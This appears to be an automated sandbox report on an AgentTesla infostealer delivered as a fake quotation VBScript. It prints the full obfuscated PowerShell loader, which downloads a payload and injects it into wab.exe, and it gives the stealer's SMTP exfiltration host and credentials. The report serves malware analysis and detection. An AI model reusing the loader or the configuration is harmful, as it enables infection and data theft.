Analysis
-
max time kernel
142s -
max time network
148s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
18-06-2024 09:36
Static task
static1
Behavioral task
behavioral1
Sample
MV ROYAL QUOTATION.vbs
Resource
win7-20231129-en
General
-
Target
MV ROYAL QUOTATION.vbs
-
Size
92KB
-
MD5
1a0f278542c1a82b36d2a9339c44343f
-
SHA1
7464df5fb5eae9f2bb2de37aac91729be222c801
-
SHA256
03cbdd488fd6819ccfafa38dedf10ab4db2e9d447e69ee89f539255941ad511d
-
SHA512
4e3e255185ffe407661cd5f6ef18aceaf39e4b7410926e14c2580fe9ba7a5ba3edbdf5834c03eec9662ab6b111da262ba5f8632e3304766eb99f42a60eb62ec6
-
SSDEEP
1536:w01/LsA0DnkdzhX7RXaSMmr2rFHxsASgxWxCwhrdM5R/:w09LB0DnWzhX7RXaSMxhxsAhWEwhrdMT
Malware Config
Extracted
agenttesla
Protocol: smtp- Host:
mail.myhydropowered.com - Port:
587 - Username:
[email protected] - Password:
0TFiRgPxmCJcdSB - Email To:
[email protected]
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
Blocklisted process makes network request 5 IoCs
Processes:
powershell.exeflow pid process 5 1172 powershell.exe 7 1172 powershell.exe 9 1172 powershell.exe 12 1172 powershell.exe 14 1172 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 20 api.ipify.org 21 api.ipify.org 22 ip-api.com -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
Processes:
wab.exepid process 2752 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
powershell.exewab.exepid process 2308 powershell.exe 2752 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 2308 set thread context of 2752 2308 powershell.exe wab.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exewab.exepid process 1172 powershell.exe 2308 powershell.exe 2308 powershell.exe 2752 wab.exe 2752 wab.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
powershell.exepid process 2308 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
Processes:
powershell.exepowershell.exewab.exedescription pid process Token: SeDebugPrivilege 1172 powershell.exe Token: SeDebugPrivilege 2308 powershell.exe Token: SeDebugPrivilege 2752 wab.exe -
Suspicious use of WriteProcessMemory 20 IoCs
Processes:
WScript.exepowershell.exepowershell.exedescription pid process target process PID 1072 wrote to memory of 1172 1072 WScript.exe powershell.exe PID 1072 wrote to memory of 1172 1072 WScript.exe powershell.exe PID 1072 wrote to memory of 1172 1072 WScript.exe powershell.exe PID 1172 wrote to memory of 2880 1172 powershell.exe cmd.exe PID 1172 wrote to memory of 2880 1172 powershell.exe cmd.exe PID 1172 wrote to memory of 2880 1172 powershell.exe cmd.exe PID 1172 wrote to memory of 2308 1172 powershell.exe powershell.exe PID 1172 wrote to memory of 2308 1172 powershell.exe powershell.exe PID 1172 wrote to memory of 2308 1172 powershell.exe powershell.exe PID 1172 wrote to memory of 2308 1172 powershell.exe powershell.exe PID 2308 wrote to memory of 1732 2308 powershell.exe cmd.exe PID 2308 wrote to memory of 1732 2308 powershell.exe cmd.exe PID 2308 wrote to memory of 1732 2308 powershell.exe cmd.exe PID 2308 wrote to memory of 1732 2308 powershell.exe cmd.exe PID 2308 wrote to memory of 2752 2308 powershell.exe wab.exe PID 2308 wrote to memory of 2752 2308 powershell.exe wab.exe PID 2308 wrote to memory of 2752 2308 powershell.exe wab.exe PID 2308 wrote to memory of 2752 2308 powershell.exe wab.exe PID 2308 wrote to memory of 2752 2308 powershell.exe wab.exe PID 2308 wrote to memory of 2752 2308 powershell.exe wab.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\MV ROYAL QUOTATION.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:1072 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -windowstyle 1 "cls;$Enchisel = 1;$Skvt='ring';$Procreativity218='S';Function Tvivlesyg($tablehopped){$Strangulates=$tablehopped.Length-$Enchisel;$Stiksaars=$Procreativity218+'ubst'+$Skvt;For( $vaporisers=7;$vaporisers -lt $Strangulates;$vaporisers+=8){$Donnie+=$tablehopped.$Stiksaars.Invoke( $vaporisers, $Enchisel);}$Donnie;}function Oversway($Ynglestedernes){ . ($Hjemsgelse) ($Ynglestedernes);}$Tiplet=Tvivlesyg ' Sed.elMStershaoDidymisz Hurry.i AkvarilSy heeklinextr a unolog/Prisonf5Ioniser.Sultana0Plateau Topa,ol( PrinteWleukophiYdmygstnGldelsedkomediaoEndel,gw Mercedsblokker ,tabstaN Strst T Pr pre Grometr1 Perine0Brtsejl.Ukrnkel0Aa nend;cinquef A,venarWUndis,oi Impa.snra,gedn6i citat4Fundame;Unidyll E.ilicsx Antise6Sekunde4Furcife; Im,alm DramatirUnirascv L,erst:Program1Scattie2P.imrko1Rabbitl. Tampon0Serjean)Lgetsob Pesh.toGkontr leCantatoc bucibak.ncrankoEndoper/ Ophtha2Unossif0Plastom1Nulpunk0Ne vebu0Fulth,r1 Handma0Reformp1Beachhe GuldaldFKudizeoiUdgrfter rlenate,uccinifAciculuoaglipayxLnindeh/Resgues1avancem2Optaell1Startel.Forspil0Latente ';$Leucadendron=Tvivlesyg ' Au,optUAppeases .kkemoe,lankearT,aditi-NarcissAGiordang eje,doeSal.antn Kdva,etRefl ks ';$Enhardy=Tvivlesyg ' LaborahTri,ngut HjlpeptDriftsipGaleasesSvingta:Con lob/Subtaxo/vebgernd LairmerfremmeliKv.ddervInksta e ma,rop. Pr gragSmalskuo AdjudaoKlipning.loreatlBeseecheHaspnin.Autogencambulato Rentenm Unhurr/Daoinesu Samme.cEn iche?Paaskese Ko,sulxliflighpanhuggeo IdemanrChieft tRestbal=stoffrid Po.byco Rep,riwpa sionn Jeopa,lGalapagoBum.assaMessi.gdAldocoo&Gnidni.iKo.dnindOverdoz=F,ntina1Chassep_SceneriNExaratiXRisikobtComptinWCrappi L,ntipudoHvedemewIndoktrEDermatrLJoker eOT.rnebr3Adiat eAMentaluw Adminil,emalsnTRemolliGIm.atieXSuppl m2.raktatJ SeminaRbob,nerPOtoplasLIn.rejsdAdderesc JennetR Lyk,es1Reentraa.rstninXasnerscE HemidaRInvpegaJPaatage ';$Eigenvalues=Tvivlesyg ' gump.i>Fo.blff ';$Hjemsgelse=Tvivlesyg 'Arbejd.iAdjoin.eproduk x Skn.it ';$Stadselige='Bkkenbenets';$Woodspite = Tvivlesyg 'FlseneseBordskacKalciumhYclepedoKrystal Clurica%CosuretaCaveaeppmeningspBirdbatd DratteaKjllertt GelatiaTele.on%.odulud\OverhalSS,burbacNonscierFlaskeaoLokalavu,eathergUndersteKartone.Skraa eSBesin ewFjer,gtiSibbss. urbopr&Narcoti&Overmen Mongrele Aalbe.cQerssheh Skolelo Postlu sarco,otIndices ';Oversway (Tvivlesyg 'Trevang$Kighullg.ykologlKneepieoCon.umabTreeshiau,womanlOverbas: fagemeAOutpassfs.mbionfFa.tiglyFricatirInters,iFodboldnBebopp,gPeroliasLectorsr W.xinga Pr,ssimLangtrupPullulaeTeltligrAfpri,ns Kumysb=Sacchar( Eniguac aarg nmMangonedLaurasp Re.ogni/Teemingc D.ainl Smreri$Sho esfWPhrenoloUdkasteo Hypodidkropsvis fe.ledpSurfboaiUdgivelt Unboxee,allele)Avarit. ');Oversway (Tvivlesyg 'For,tag$girondeg F eratlTyvst,loHydrosebP.steuraR,ddersl Napole:SnderjyS .ommany Fordums KommistMonarkieUrigtigmAnte ebuTil,ager D utereKanoniss Tele n= Greesa$UnreplaE,tundern StillfhSurretoaGrac,lurSentimedSubgrapyParoemi. SkaktesU,municpSl,venel DispeoiSlakytetFos erh(Tmmermn$ CamphiENondea,iTrvejorg Denns,equidd enFelixspvBrudeudaFemtenalElleve.u trypsieGenkaldsPhiloso)Baarebu ');Oversway (Tvivlesyg 'special[OmodyniNCymricjeVilligstSvejsef.KvittepS UndeteeSta,darrUfordjevSup osaiRep imecTouchileVegetarP Hen,edoDechifriInterrunof entltInkenbuMNit,ogeaSorrywanLi,jesta Hipp,pgOrganise.xtradurrevolub]Plenumd: Subdue:ChannelSEanmisdeO.ersigcVgkon,auB,ttermrChoryzai,anhapitYngle.tycephaloPfoelgevrconcilio NonpertTrickiloOver,nccUnpenneo DrikkelSsonfor Ka ital= Iagtta Knebler[OparbejNnicolinebesmreltMellem,.overwovSTandemmeNominalcUnderglurodekasrTherma iBugcerttCr ftmayTemplesPButchesrRekogn.oBa,dendtEuascomoSystolicNichisroT.pehuslApodedeTFlugte.yAb,nnemp FiskeaeRemplac]Superex:Asexual:Mill,reT Emydinl,ryptodsCo,nect1Birkies2Pectina ');$Enhardy=$Systemures[0];$Hypokinetic= (Tvivlesyg 'Disk ej$Stt.epigHentydelFrak aloCochoncbErklrinaGlanspelAmylops:CecilsuMSubstanaCytostolDod eraiImper agMalars,nMelasseeGondr crAfs reds Konfig=TromsteN pottyseSor,seswKullagr- kmacroO FecalcbfaunernjFoder,ee,lonrevc M,ologt Oppo,i SunnsuStegneomy irenssA bejdstcoxorane AdminimDimers,. DiskofNRumak seLi.leskt veget .AprildaWAffronteMult.cibPass.viCVipstjelbegrebsiembou heZygomycn Bitbltt');$Hypokinetic+=$Affyringsrampers[1];Oversway ($Hypokinetic);Oversway (Tvivlesyg 'Cuisi,i$ SpindeMOnondaga DisketlRepavedi SyltetgObjectinW.lburte MemorarGastronsUndervi. FlocciH Kekchie A,toniaKppetordudho.deediatomar Strik,s Fa,tsa[Outyiel$TransskLIncur aeTropekluSmaaligcForhuseaSymp omd.rosaekeHustruenGoldenwdDistrahrProstatoyaroviznv ffelj]Syneriz=Overdra$SolicitTAnoeticij panvgpCapriccl MangeseForretntGrillst ');$Nonadjudicated=Tvivlesyg 'Agrom z$Ent popMFornaglaCycliselDescriai ConvengFastsaenpuckableUdbytterpreentes pfenni.magthavDEnaarinoIcterinwNotabiln He erolProduktoconspicaPana.ead,ubjectF eprousi avigel blgetrem,terin( Slutor$ AntiksE Photodn Stolpehtr.ssmaadiarkterMaharandUddeligyFrandse,.orklar$Blles.mO La.roioRainproc CitolayIrresonsMultivetKib ages G.stro)Ineff.r ';$Oocysts=$Affyringsrampers[0];Oversway (Tvivlesyg ' hirten$ FestligAdia.helAfbrksboVaterlibParaciuaOwllikel Boobie:Krim,krB Accouna bedsp,bImpingebTingfstlTonsilleDampdredReautho=Indeksa( NationTWaistcoeCubo des OvillutTirsdag- holismPOpmrksoaBrasnentStboldehMuskula Trusser$ForedesOContagioPerora.cFejteneyImdegaas Knifeptal.rmersu.fritn)udmugni ');while (!$Babbled) {Oversway (Tvivlesyg ' Fritlb$rv nessgUd,ortelDiskeseoSaxofonbHormoniaPreaddil Grns.f:tilregnM SlibesiBestiklcEldrev,rReassa.oGryntencDukkerthTi bageiKlatch,rCannonboSvitserpFjorte,tTrefoileRoo,aanrDatam.taSolvemenM dgaae=Piskefl$Uhin,retIllegalr Dekantu efraine Unname ') ;Oversway $Nonadjudicated;Oversway (Tvivlesyg 'D.celerSAlienatt irdleaBismethr Arb.ritSa.sons-SkemabuSK,astralAtticise elatineManifesp hunden patined4Vagnarb ');Oversway (Tvivlesyg 'Oligosy$FeifrefgSalgsvalAwe,lyioNonecumbOpgiveta BuckeylHydroae:Stear nBMerudgia Penetrb Fiskesbbureaucl Forttse Idiomedtrykfje=myxop.y(MalaromTHofjg.reUnprodesv,lkomst Deling-DyrepenPPoliovaapseudobtLitote h ensket Caddien$ An.ilsONonlarcoFlageolcGeophagy unparosSyvkantt Deft.ysMo oriz)Easies ') ;Oversway (Tvivlesyg 'Bio oci$StdpudegPimperilInsubduoStegebob.iruettaMilieutlHyp chr:Rig.andHDi ownayForpaknb HuslejaAnlg.panHiredsqt Fri.kehNerveliu GodvilsSawsmit=Central$S.rumalgTe sturlLimousio.adedlyb Selv,vaCoccololDyrenav: Huks,eGLavad laHewettil Def.ktl Regnspe.ryntprrManualeeGenstarnNimblewsSprregr2 Anti,i0Repe,ce4Isogona+Jul,aft+Cirklel%Torisnu$Soap laS Vicenty PulpstsTrimerit GennemeHuffilymB otheruPotentirCervicoeCyrillis Pr.imb.NoncalccSpaltepoVenten,uKrops.inRadi,let.midazo ') ;$Enhardy=$Systemures[$Hybanthus];}$Krigsfangers=349622;$Countermands=30457;Oversway (Tvivlesyg 'Monof a$Deu,schgUpharsil M.sedioFirlotbbTrngslea mpshemlStilett:skienssDSmallhoeKontr.lr Tudl,keUnbellilRantmuciKa ayafc Faste,tIndentusFormumn Lugsome= Indfoe EtageadGJededi eTrassertFe,iesy- LgformC ChequeoLytforvn Tr erstRecent.eUsaglignChessart bivoks Lyctida$ MetodiOBlousesoRivindfcprotegeyDisagresdromaeotEvidenssF.nansl ');Oversway (Tvivlesyg 'Pens,on$SkglavegLumenallSparekao R,glanb mellemaFrekvenlOverres:Brandmes Hy.ogenLuxembuaDybstrupCevichesAllove eAlexandtU,frsleiho agognSlvstolg SkjteseUnsamplt SmeltnsUmaleta T.xamet=Vaabenh Resorpt[ RibbonS,lkekarySkuddensB,ttinatsukkeute Supposm Combur. owbaneCOutdwelo Paillen PishogvUnbittie Au,oblrextrasctUnraile] Okse.u:Lyk,eop:DypningF LigedarRet.rdioFyge,anmExaminiBNereideata aceasAcajoubeGaldest6Dilata 4SildebeSSkjtendtillusiorTil.oldi Recursn PantstgMocking(Cabotin$NstmindD BlumineSpeditirWaddi.reStud relSelvforisprangscUdvirknt Semicosour,bie)Copepod ');Oversway (Tvivlesyg 'Dugperl$s,omatogFinhvallBivuakeoBli sedb Yobbo.aU listnlStrmmen: OpkrvnE PoleaxtU,elikah Platyro Chl rixAerodyniCook aseCunjergs Amaret1Citr.ll1Epoxyla9Skomage Depermi=konjunk Fyrr.tr[temp raSMejslinyTridimes ookhot ScenogedisgrosmHje meh. AerobaTfarvemee ReratexSystemptSjleso.. eltmarETartufinKursliscPalatoroBrushpodtredjegiGlyptotnGartnerg Presol] Gr ofx: Trying: TilthsALiddenfSTrellisCKkkenboIDaakalvIWhitesi. AnchisGSoftbale un,ramtCompartS KongretKrage.orSlaggedi OverponRullersgF shmou(outland$Tildigts PrevienForsknia Ra.finpkulbuelsDalstrgeHyperdit AerostiSubdepanHopefulg,ladderehemicyctEro.ogesBize.ma)P.rsone ');Oversway (Tvivlesyg 'Hypercy$Varpet.g,wiftenlLegatesoR ggersb,urisdiaNaturlolrocke s:StyringS PostichAftopnioMangilyvTrowabliMoskusknSubethfgNatbord=Theater$StichosEEkspo,etFysiurghbukse,noAloysiaxLemperui T gneseV.ndudssLushnes1 Brneli1Karenst9Purlgse.RetropesMilvusiuDubietibAntikvasFlappert BodhisrBrugskuiSalgsstn Coventg Dressm(Jernfor$ FintmaKP,leogerStrkni.i KrlgtegNonpenasRevendffTak,eska Cathetn F.ldepgLindedeeBesparerVerdenssVin,ues,Konkre,$ BespirCPosteroo SpegepuRaaglasnKarbonatSluddere Platear.nefuldm.anacetaForsty.nSoarer dSkriftesUnrem,t) A,hron ');Oversway $Shoving;"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1172 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Scrouge.Swi && echo t"3⤵PID:2880
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;$Enchisel = 1;$Skvt='ring';$Procreativity218='S';Function Tvivlesyg($tablehopped){$Strangulates=$tablehopped.Length-$Enchisel;$Stiksaars=$Procreativity218+'ubst'+$Skvt;For( $vaporisers=7;$vaporisers -lt $Strangulates;$vaporisers+=8){$Donnie+=$tablehopped.$Stiksaars.Invoke( $vaporisers, $Enchisel);}$Donnie;}function Oversway($Ynglestedernes){ . ($Hjemsgelse) ($Ynglestedernes);}$Tiplet=Tvivlesyg ' Sed.elMStershaoDidymisz Hurry.i AkvarilSy heeklinextr a unolog/Prisonf5Ioniser.Sultana0Plateau Topa,ol( PrinteWleukophiYdmygstnGldelsedkomediaoEndel,gw Mercedsblokker ,tabstaN Strst T Pr pre Grometr1 Perine0Brtsejl.Ukrnkel0Aa nend;cinquef A,venarWUndis,oi Impa.snra,gedn6i citat4Fundame;Unidyll E.ilicsx Antise6Sekunde4Furcife; Im,alm DramatirUnirascv L,erst:Program1Scattie2P.imrko1Rabbitl. Tampon0Serjean)Lgetsob Pesh.toGkontr leCantatoc bucibak.ncrankoEndoper/ Ophtha2Unossif0Plastom1Nulpunk0Ne vebu0Fulth,r1 Handma0Reformp1Beachhe GuldaldFKudizeoiUdgrfter rlenate,uccinifAciculuoaglipayxLnindeh/Resgues1avancem2Optaell1Startel.Forspil0Latente ';$Leucadendron=Tvivlesyg ' Au,optUAppeases .kkemoe,lankearT,aditi-NarcissAGiordang eje,doeSal.antn Kdva,etRefl ks ';$Enhardy=Tvivlesyg ' LaborahTri,ngut HjlpeptDriftsipGaleasesSvingta:Con lob/Subtaxo/vebgernd LairmerfremmeliKv.ddervInksta e ma,rop. Pr gragSmalskuo AdjudaoKlipning.loreatlBeseecheHaspnin.Autogencambulato Rentenm Unhurr/Daoinesu Samme.cEn iche?Paaskese Ko,sulxliflighpanhuggeo IdemanrChieft tRestbal=stoffrid Po.byco Rep,riwpa sionn Jeopa,lGalapagoBum.assaMessi.gdAldocoo&Gnidni.iKo.dnindOverdoz=F,ntina1Chassep_SceneriNExaratiXRisikobtComptinWCrappi L,ntipudoHvedemewIndoktrEDermatrLJoker eOT.rnebr3Adiat eAMentaluw Adminil,emalsnTRemolliGIm.atieXSuppl m2.raktatJ SeminaRbob,nerPOtoplasLIn.rejsdAdderesc JennetR Lyk,es1Reentraa.rstninXasnerscE HemidaRInvpegaJPaatage ';$Eigenvalues=Tvivlesyg ' gump.i>Fo.blff ';$Hjemsgelse=Tvivlesyg 'Arbejd.iAdjoin.eproduk x Skn.it ';$Stadselige='Bkkenbenets';$Woodspite = Tvivlesyg 'FlseneseBordskacKalciumhYclepedoKrystal Clurica%CosuretaCaveaeppmeningspBirdbatd DratteaKjllertt GelatiaTele.on%.odulud\OverhalSS,burbacNonscierFlaskeaoLokalavu,eathergUndersteKartone.Skraa eSBesin ewFjer,gtiSibbss. urbopr&Narcoti&Overmen Mongrele Aalbe.cQerssheh Skolelo Postlu sarco,otIndices ';Oversway (Tvivlesyg 'Trevang$Kighullg.ykologlKneepieoCon.umabTreeshiau,womanlOverbas: fagemeAOutpassfs.mbionfFa.tiglyFricatirInters,iFodboldnBebopp,gPeroliasLectorsr W.xinga Pr,ssimLangtrupPullulaeTeltligrAfpri,ns Kumysb=Sacchar( Eniguac aarg nmMangonedLaurasp Re.ogni/Teemingc D.ainl Smreri$Sho esfWPhrenoloUdkasteo Hypodidkropsvis fe.ledpSurfboaiUdgivelt Unboxee,allele)Avarit. ');Oversway (Tvivlesyg 'For,tag$girondeg F eratlTyvst,loHydrosebP.steuraR,ddersl Napole:SnderjyS .ommany Fordums KommistMonarkieUrigtigmAnte ebuTil,ager D utereKanoniss Tele n= Greesa$UnreplaE,tundern StillfhSurretoaGrac,lurSentimedSubgrapyParoemi. SkaktesU,municpSl,venel DispeoiSlakytetFos erh(Tmmermn$ CamphiENondea,iTrvejorg Denns,equidd enFelixspvBrudeudaFemtenalElleve.u trypsieGenkaldsPhiloso)Baarebu ');Oversway (Tvivlesyg 'special[OmodyniNCymricjeVilligstSvejsef.KvittepS UndeteeSta,darrUfordjevSup osaiRep imecTouchileVegetarP Hen,edoDechifriInterrunof entltInkenbuMNit,ogeaSorrywanLi,jesta Hipp,pgOrganise.xtradurrevolub]Plenumd: Subdue:ChannelSEanmisdeO.ersigcVgkon,auB,ttermrChoryzai,anhapitYngle.tycephaloPfoelgevrconcilio NonpertTrickiloOver,nccUnpenneo DrikkelSsonfor Ka ital= Iagtta Knebler[OparbejNnicolinebesmreltMellem,.overwovSTandemmeNominalcUnderglurodekasrTherma iBugcerttCr ftmayTemplesPButchesrRekogn.oBa,dendtEuascomoSystolicNichisroT.pehuslApodedeTFlugte.yAb,nnemp FiskeaeRemplac]Superex:Asexual:Mill,reT Emydinl,ryptodsCo,nect1Birkies2Pectina ');$Enhardy=$Systemures[0];$Hypokinetic= (Tvivlesyg 'Disk ej$Stt.epigHentydelFrak aloCochoncbErklrinaGlanspelAmylops:CecilsuMSubstanaCytostolDod eraiImper agMalars,nMelasseeGondr crAfs reds Konfig=TromsteN pottyseSor,seswKullagr- kmacroO FecalcbfaunernjFoder,ee,lonrevc M,ologt Oppo,i SunnsuStegneomy irenssA bejdstcoxorane AdminimDimers,. DiskofNRumak seLi.leskt veget .AprildaWAffronteMult.cibPass.viCVipstjelbegrebsiembou heZygomycn Bitbltt');$Hypokinetic+=$Affyringsrampers[1];Oversway ($Hypokinetic);Oversway (Tvivlesyg 'Cuisi,i$ SpindeMOnondaga DisketlRepavedi SyltetgObjectinW.lburte MemorarGastronsUndervi. FlocciH Kekchie A,toniaKppetordudho.deediatomar Strik,s Fa,tsa[Outyiel$TransskLIncur aeTropekluSmaaligcForhuseaSymp omd.rosaekeHustruenGoldenwdDistrahrProstatoyaroviznv ffelj]Syneriz=Overdra$SolicitTAnoeticij panvgpCapriccl MangeseForretntGrillst ');$Nonadjudicated=Tvivlesyg 'Agrom z$Ent popMFornaglaCycliselDescriai ConvengFastsaenpuckableUdbytterpreentes pfenni.magthavDEnaarinoIcterinwNotabiln He erolProduktoconspicaPana.ead,ubjectF eprousi avigel blgetrem,terin( Slutor$ AntiksE Photodn Stolpehtr.ssmaadiarkterMaharandUddeligyFrandse,.orklar$Blles.mO La.roioRainproc CitolayIrresonsMultivetKib ages G.stro)Ineff.r ';$Oocysts=$Affyringsrampers[0];Oversway (Tvivlesyg ' hirten$ FestligAdia.helAfbrksboVaterlibParaciuaOwllikel Boobie:Krim,krB Accouna bedsp,bImpingebTingfstlTonsilleDampdredReautho=Indeksa( NationTWaistcoeCubo des OvillutTirsdag- holismPOpmrksoaBrasnentStboldehMuskula Trusser$ForedesOContagioPerora.cFejteneyImdegaas Knifeptal.rmersu.fritn)udmugni ');while (!$Babbled) {Oversway (Tvivlesyg ' Fritlb$rv nessgUd,ortelDiskeseoSaxofonbHormoniaPreaddil Grns.f:tilregnM SlibesiBestiklcEldrev,rReassa.oGryntencDukkerthTi bageiKlatch,rCannonboSvitserpFjorte,tTrefoileRoo,aanrDatam.taSolvemenM dgaae=Piskefl$Uhin,retIllegalr Dekantu efraine Unname ') ;Oversway $Nonadjudicated;Oversway (Tvivlesyg 'D.celerSAlienatt irdleaBismethr Arb.ritSa.sons-SkemabuSK,astralAtticise elatineManifesp hunden patined4Vagnarb ');Oversway (Tvivlesyg 'Oligosy$FeifrefgSalgsvalAwe,lyioNonecumbOpgiveta BuckeylHydroae:Stear nBMerudgia Penetrb Fiskesbbureaucl Forttse Idiomedtrykfje=myxop.y(MalaromTHofjg.reUnprodesv,lkomst Deling-DyrepenPPoliovaapseudobtLitote h ensket Caddien$ An.ilsONonlarcoFlageolcGeophagy unparosSyvkantt Deft.ysMo oriz)Easies ') ;Oversway (Tvivlesyg 'Bio oci$StdpudegPimperilInsubduoStegebob.iruettaMilieutlHyp chr:Rig.andHDi ownayForpaknb HuslejaAnlg.panHiredsqt Fri.kehNerveliu GodvilsSawsmit=Central$S.rumalgTe sturlLimousio.adedlyb Selv,vaCoccololDyrenav: Huks,eGLavad laHewettil Def.ktl Regnspe.ryntprrManualeeGenstarnNimblewsSprregr2 Anti,i0Repe,ce4Isogona+Jul,aft+Cirklel%Torisnu$Soap laS Vicenty PulpstsTrimerit GennemeHuffilymB otheruPotentirCervicoeCyrillis Pr.imb.NoncalccSpaltepoVenten,uKrops.inRadi,let.midazo ') ;$Enhardy=$Systemures[$Hybanthus];}$Krigsfangers=349622;$Countermands=30457;Oversway (Tvivlesyg 'Monof a$Deu,schgUpharsil M.sedioFirlotbbTrngslea mpshemlStilett:skienssDSmallhoeKontr.lr Tudl,keUnbellilRantmuciKa ayafc Faste,tIndentusFormumn Lugsome= Indfoe EtageadGJededi eTrassertFe,iesy- LgformC ChequeoLytforvn Tr erstRecent.eUsaglignChessart bivoks Lyctida$ MetodiOBlousesoRivindfcprotegeyDisagresdromaeotEvidenssF.nansl ');Oversway (Tvivlesyg 'Pens,on$SkglavegLumenallSparekao R,glanb mellemaFrekvenlOverres:Brandmes Hy.ogenLuxembuaDybstrupCevichesAllove eAlexandtU,frsleiho agognSlvstolg SkjteseUnsamplt SmeltnsUmaleta T.xamet=Vaabenh Resorpt[ RibbonS,lkekarySkuddensB,ttinatsukkeute Supposm Combur. owbaneCOutdwelo Paillen PishogvUnbittie Au,oblrextrasctUnraile] Okse.u:Lyk,eop:DypningF LigedarRet.rdioFyge,anmExaminiBNereideata aceasAcajoubeGaldest6Dilata 4SildebeSSkjtendtillusiorTil.oldi Recursn PantstgMocking(Cabotin$NstmindD BlumineSpeditirWaddi.reStud relSelvforisprangscUdvirknt Semicosour,bie)Copepod ');Oversway (Tvivlesyg 'Dugperl$s,omatogFinhvallBivuakeoBli sedb Yobbo.aU listnlStrmmen: OpkrvnE PoleaxtU,elikah Platyro Chl rixAerodyniCook aseCunjergs Amaret1Citr.ll1Epoxyla9Skomage Depermi=konjunk Fyrr.tr[temp raSMejslinyTridimes ookhot ScenogedisgrosmHje meh. AerobaTfarvemee ReratexSystemptSjleso.. eltmarETartufinKursliscPalatoroBrushpodtredjegiGlyptotnGartnerg Presol] Gr ofx: Trying: TilthsALiddenfSTrellisCKkkenboIDaakalvIWhitesi. AnchisGSoftbale un,ramtCompartS KongretKrage.orSlaggedi OverponRullersgF shmou(outland$Tildigts PrevienForsknia Ra.finpkulbuelsDalstrgeHyperdit AerostiSubdepanHopefulg,ladderehemicyctEro.ogesBize.ma)P.rsone ');Oversway (Tvivlesyg 'Hypercy$Varpet.g,wiftenlLegatesoR ggersb,urisdiaNaturlolrocke s:StyringS PostichAftopnioMangilyvTrowabliMoskusknSubethfgNatbord=Theater$StichosEEkspo,etFysiurghbukse,noAloysiaxLemperui T gneseV.ndudssLushnes1 Brneli1Karenst9Purlgse.RetropesMilvusiuDubietibAntikvasFlappert BodhisrBrugskuiSalgsstn Coventg Dressm(Jernfor$ FintmaKP,leogerStrkni.i KrlgtegNonpenasRevendffTak,eska Cathetn F.ldepgLindedeeBesparerVerdenssVin,ues,Konkre,$ BespirCPosteroo SpegepuRaaglasnKarbonatSluddere Platear.nefuldm.anacetaForsty.nSoarer dSkriftesUnrem,t) A,hron ');Oversway $Shoving;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2308 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Scrouge.Swi && echo t"4⤵PID:1732
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2752
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5a266bb7dcc38a562631361bbf61dd11b
SHA13b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA5120da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD5c5411556099cd659b07a93f6df871069
SHA1f93759b25079e7befc9dfdd5812695536794d468
SHA25694a239a3cedd0b33b263a5e18527bfe7179e09fcf3221d513dc898265248cf9a
SHA512ee6e79ffec042dd961234d0b447b060e763df5af9cb7f31064c665b51c5d59f59dfcd02cd06417801f6c8e968663371c92fb7dfd22e0dc71a7e7e1f3c3b10555
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
Filesize242B
MD5666c6eca442cb8196b4c9db0b1c9e0df
SHA1db50b88aa11ce49dd156630ef2d46f00ad56e4c8
SHA2566784803fe36840cc325e7b0d3ad5a7ca9acdd6e837daa29820455c327b8ca991
SHA5122d98fcd5c5675ecd4077d8636aab9adea62cdcc74133bd17d0af8790c8f32cf3625eccdd1e7bc9c33c126df6c9582d976c2cabc277d0e3d54905fccdc98e9804
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
